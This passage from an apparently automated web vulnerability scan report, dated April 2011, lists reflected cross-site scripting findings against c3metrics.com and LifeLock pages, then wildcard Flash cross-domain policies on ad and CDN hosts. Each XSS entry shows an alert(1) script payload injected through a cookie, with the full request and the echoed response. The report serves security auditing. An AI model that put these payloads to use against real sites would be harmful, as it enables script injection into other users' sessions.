}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&c4fd8<script>alert(1)</script>77954a0fecc', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig=
...[SNIP]...

5.93. http://breathe.c3metrics.com/c3realview.js [C3UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://breathe.c3metrics.com
Path:   /c3realview.js

Issue detail

The value of the C3UID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 372b9'%3balert(1)//28e517d2070 was submitted in the C3UID cookie. This input was echoed as 372b9';alert(1)//28e517d2070 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c3realview.js HTTP/1.1
Host: breathe.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803372b9'%3balert(1)//28e517d2070; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:42 GMT
Server: Apache
P3P: CP="NON DSP CURa ADMo DEVo PSAo PSDo IVAo IVDo OUR SAMo BUS UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Connection: close
Content-Type: text/html
Content-Length: 9648

(function(){c3CTJS={c3CTVersion:{vNo:'5.1.0'},c3CJS:{c3CJScampignId:'480',c3CJSdomain:null,c3VJSuid:'13014572191303613803372b9';alert(1)//28e517d2070',c3VJSnuid:'',c3CJSnetwork:'1',c3CJSOrganic:1,c3CJSOrganicQ:2,c3CJSlenSet:2,c3CJSSPlitchar:"-",c3CJSSearchString:null,c3CJSqueryVar:new Array(),c3CJSvtImg:"/1.gif",c3thisFileName:'c3metrics.php',c3CJS
...[SNIP]...

5.94. http://www.lifelock.com/about/leadership/management/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/leadership/management/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c606"><script>alert(1)</script>44823d22b35 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/leadership/management/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.3.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH131c606"><script>alert(1)</script>44823d22b35; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/36

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:06 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=e26e4dc493f4a4caf15b4aaabe78cd2f3ec073d706939dfc4db3979a; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18362

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch131c606"><script>alert(1)</script>44823d22b35" class="enroll-now">
...[SNIP]...

5.95. http://www.lifelock.com/about/lifelock-in-the-community/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/lifelock-in-the-community/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f44"><script>alert(1)</script>cf60dea9c5 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/lifelock-in-the-community/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=3e9d64599ec3dc11eab7f4125fe101c63ec073d706939dfc4db392a6; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.2.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH1319f44"><script>alert(1)</script>cf60dea9c5; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/2/9

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:22:59 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=bbb4c353da958a49066e32345fe550473ec073d706939dfc4db39793; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 16031

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1319f44"><script>alert(1)</script>cf60dea9c5" class="enroll-now">
...[SNIP]...

5.96. http://www.lifelock.com/guarantee/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /guarantee/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94aa7"><script>alert(1)</script>167524f77ad was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /guarantee/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; LifeLockEnrollment=promoCode=GOOGSEARCH1394aa7"><script>alert(1)</script>167524f77ad; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.6.10.1303613800; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/54

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:21:36 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=66a7695384996248881c6a8ba7494b0a3ec073d706939dfc4db39740; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13412

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1394aa7"><script>alert(1)</script>167524f77ad" class="enroll-now">
...[SNIP]...

5.97. http://www.lifelock.com/how-it-works/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /how-it-works/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bdd"><script>alert(1)</script>b0ca6746d39 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /how-it-works/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13e3bdd"><script>alert(1)</script>b0ca6746d39; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:37 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=4e6b2ce904419aa4e205c488d5ec5cb83ec073d706939dfc4db397b9; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 12713

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch13e3bdd"><script>alert(1)</script>b0ca6746d39" class="enroll-now">
...[SNIP]...

5.98. http://www.lifelock.com/identity-theft/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /identity-theft/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58800"><script>alert(1)</script>8aee1f6f841 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /identity-theft/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH1358800"><script>alert(1)</script>8aee1f6f841; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:45 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=bc5461a6bc59c952ded36dc474d908a43ec073d706939dfc4db397c1; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 32728

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1358800"><script>alert(1)</script>8aee1f6f841" class="enroll-now">
...[SNIP]...

6. Flash cross-domain policy  previous  next
There are 40 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://2byto.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2byto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 2byto.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:40:40 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Last-Modified: Mon, 08 Mar 2010 00:38:12 GMT
ETag: "10000000fc553-145-4813f47ac1b42"
Accept-Ranges: bytes
Content-Length: 325
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.2. http://4.bp.blogspot.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://4.bp.blogspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 4.bp.blogspot.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Sun, 24 Apr 2011 03:14:44 GMT
Expires: Mon, 25 Apr 2011 03:14:44 GMT
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:14:44 GMT
Server: fife
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400, no-transform
Age: 34168

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.3. http://ad.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Sun, 24 Apr 2011 12:37:00 GMT
Content-Type: text/xml
Content-Length: 302
Date: Sun, 24 Apr 2011 12:29:26 GMT
X-Varnish: 2161408220 2161275960
Age: 21142
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

6.4. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 24 Apr 2011 04:08:22 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.5. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 25 Apr 2011 02:27:33 GMT
Date: Sun, 24 Apr 2011 02:27:33 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 36488

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.6. http://analytic.hotelclub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytic.hotelclub.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:52 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.7. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.8. http://at.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Sun, 24 Apr 2011 09:16:39 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

6.9. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:29:52 GMT
Date: Sun, 24 Apr 2011 12:29:52 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.10. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:09:49 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.11. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Sun, 24 Apr 2011 12:33:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.12. http://bp.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
